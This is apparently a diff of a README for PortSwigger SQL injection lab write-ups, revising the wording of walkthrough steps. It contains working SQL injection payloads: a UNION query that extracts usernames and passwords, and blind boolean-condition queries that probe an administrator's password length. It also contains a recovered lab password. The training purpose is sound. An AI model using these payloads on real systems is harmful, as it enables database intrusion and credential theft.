Luk4szf/PortSwigger/SQL injection/README.md

 SELECT * FROM someTable WHERE category='any' UNION SELECT null, username || '~' || password FROM users--
 ```

-This reveals the password for the `administrator`.
+I found that the password for the administrator is `8nx1xp93b0xyx4a2p33f`.

 # Blind SQL Injection with Conditional Responses

 ## Lab Description
 ![image](Picture/lab9.png)

-In this lab, we will exploit a blind SQL injection vulnerability by using conditional responses to extract information.
-The page displays "Welcome back" when the query returns any rows.
+In this lab, we exploit a blind SQL injection vulnerability by using conditional responses to extract information.
+The page displays "Welcome back" when the SQL query returns any rows.

 ### Step 1: Confirming the Injection Point

-We can test this by injecting a condition that is always true:
+We can test the injection point by injecting a condition that is always true:

 ```sql
 SELECT TrackingId FROM someTable WHERE TrackingId = 'xyz' AND 1=1--
 ```

-If the page shows "Welcome back," the injection point is confirmed.
+If the page shows "Welcome back," it confirms that the injection point is vulnerable.

 ### Step 2: Determining the Password Length

-Next, we determine the length of the administrator's password by incrementally increasing the length in our query until the "Welcome back" message disappears:
+Next, we determine the length of the administrator's password by incrementally increasing the length in our query until the "Welcome back" message no longer appears:

 ```sql
 SELECT TrackingId FROM someTable WHERE TrackingId = 'xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>20)='a'--